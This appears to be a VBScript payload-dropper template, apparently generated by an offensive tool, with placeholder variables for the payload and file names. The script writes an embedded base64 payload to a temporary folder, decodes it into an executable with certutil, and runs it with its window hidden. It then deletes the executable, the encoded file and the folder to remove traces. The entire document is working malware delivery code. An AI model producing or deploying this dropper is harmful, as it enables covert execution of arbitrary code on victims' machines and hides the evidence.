Function %{var_func}()
	%{var_shellcode} = "%{base64_shellcode}"

	Dim %{var_obj}
	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
	Dim %{var_stream}
	Dim %{var_tempdir}
	Dim %{var_tempbase64}
	Dim %{var_basedir}
	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
	%{var_obj}.CreateFolder(%{var_basedir})
	%{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
	%{var_stream}.Write %{var_shellcode}
	%{var_stream}.Close
	Dim %{var_shell}
	Set %{var_shell} = CreateObject("Wscript.Shell")
	%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
	%{var_shell}.run %{var_tempexe}, 0, true
    %{var_obj}.DeleteFile(%{var_tempexe})
	%{var_obj}.DeleteFile(%{var_tempbase64})
	%{var_obj}.DeleteFolder(%{var_basedir})
End Function

%{init}